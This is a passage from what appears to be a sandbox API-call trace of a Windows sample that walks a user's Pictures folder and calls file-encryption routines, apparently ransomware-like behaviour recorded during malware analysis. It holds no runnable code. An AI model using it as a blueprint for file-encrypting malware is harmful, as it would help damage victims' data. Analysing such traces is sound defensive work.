lpString2="flyingship", cchCount2=10) returned 3 [0189.250] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FFklat\\EVGfmjA.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0189.250] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Fklat\\EVGfmjA.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0189.250] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="klat\\EVGfmjA.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.250] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lat\\EVGfmjA.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.250] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="at\\EVGfmjA.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0189.250] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="t\\EVGfmjA.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.250] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\EVGfmjA.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0189.250] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EVGfmjA.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0189.250] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VGfmjA.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.250] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GfmjA.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.250] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0189.250] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0189.251] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0189.251] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0189.251] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de858 | out: hHeap=0x8a0000) returned 1 [0189.251] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0189.251] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0189.251] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0189.251] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0189.251] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0189.251] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0189.251] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf310 | out: hHeap=0x8a0000) returned 1 [0189.251] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0189.251] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0189.251] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf310 | out: hHeap=0x8a0000) returned 1 [0189.251] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0189.251] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0189.251] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="g", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0189.251] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ng", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0189.251] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="png", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0189.251] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".png", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0189.251] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0189.251] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0189.251] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0189.251] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0189.251] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0189.251] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0189.251] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0189.252] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0189.252] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0189.252] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0189.252] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0189.252] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0189.252] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def10 [0189.252] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0189.252] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0189.252] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0189.252] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0189.252] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0189.252] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0189.252] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0189.253] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0189.253] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0189.253] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0189.253] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0189.253] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0189.253] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0189.253] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0189.253] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xa0) returned 0x8f9058 [0189.253] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0189.253] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0189.253] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0189.253] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0189.253] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def10 | out: hHeap=0x8a0000) returned 1 [0189.253] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0189.253] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0189.253] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0189.253] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0189.253] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0189.253] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0189.253] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0189.253] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0189.253] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0189.253] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0189.253] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0189.253] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0189.254] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debc8 | out: hHeap=0x8a0000) returned 1 [0189.254] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0189.254] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec90 | out: hHeap=0x8a0000) returned 1 [0189.254] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0189.254] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0189.254] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0189.254] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0189.254] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deba0 | out: hHeap=0x8a0000) returned 1 [0189.254] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0189.254] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0189.254] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0189.254] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0189.254] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0c8 | out: hHeap=0x8a0000) returned 1 [0189.254] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0189.254] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedf8 | out: hHeap=0x8a0000) returned 1 [0189.254] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0189.254] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0189.254] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedd0 | out: hHeap=0x8a0000) returned 1 [0189.254] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0189.254] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0189.254] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deec0 | out: hHeap=0x8a0000) returned 1 [0189.254] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0189.254] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0189.254] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0189.254] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x170) returned 0x907778 [0189.254] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8f9058 | out: hHeap=0x8a0000) returned 1 [0189.255] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0189.255] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec90 [0189.255] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0189.255] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0189.255] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\EVGfmjA.png", lpFindFileData=0x87edb8 | out: lpFindFileData=0x87edb8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc05e48a0, ftCreationTime.dwHighDateTime=0x1d5dfa5, ftLastAccessTime.dwLowDateTime=0x283be5b0, ftLastAccessTime.dwHighDateTime=0x1d5dc0c, ftLastWriteTime.dwLowDateTime=0x283be5b0, ftLastWriteTime.dwHighDateTime=0x1d5dc0c, nFileSizeHigh=0x0, nFileSizeLow=0xa1fa, dwReserved0=0x87ef08, dwReserved1=0x8a7560, cFileName="EVGfmjA.png", cAlternateFileName="")) returned 0x90ae18 [0189.255] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0189.255] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0189.255] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0189.255] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df000 [0189.255] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0189.255] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0189.255] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0189.255] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0189.255] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0189.255] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0189.255] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0189.255] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0189.256] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0189.256] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0189.256] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df000 [0189.256] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0189.256] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0189.256] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74f20000 [0189.256] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0189.256] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0189.256] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0189.256] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0189.256] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0189.256] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0189.256] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0189.256] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0189.256] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0189.256] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0189.256] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0189.256] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0189.257] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0189.257] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0189.257] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0189.257] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0189.257] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0189.257] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded58 [0189.257] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0189.257] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0189.257] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0189.257] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0189.257] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0189.257] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0189.257] PeekMessageW (in: lpMsg=0x87eac4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eac4) returned 0 [0189.257] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0189.257] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0189.257] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0189.257] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0189.257] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0189.257] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27a8 [0189.257] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0189.257] CryptAcquireContextA (in: phProv=0x87ea98, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x87ea98*=0x9c0c88) returned 1 [0189.259] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2798 [0189.259] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0189.259] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0189.259] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0189.259] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0189.259] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0189.259] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0189.259] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0189.259] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0189.259] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0189.259] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28a8 [0189.259] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0189.259] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0189.259] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0189.259] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0189.259] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0189.259] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0189.259] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0189.260] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0189.260] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0189.260] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0189.260] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0189.260] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0189.260] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0189.260] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0189.260] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0189.260] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0189.260] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0189.260] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0189.260] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0189.260] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ae18 [0189.260] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0189.260] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0189.260] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0189.260] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0189.260] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0189.260] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0189.260] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2798 [0189.260] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0189.260] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0189.260] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.260] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0189.261] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0189.261] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0189.261] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0189.261] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0189.261] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0189.261] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.261] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0189.261] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0189.261] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0189.261] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0189.261] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0189.261] RtlAllocateHeap 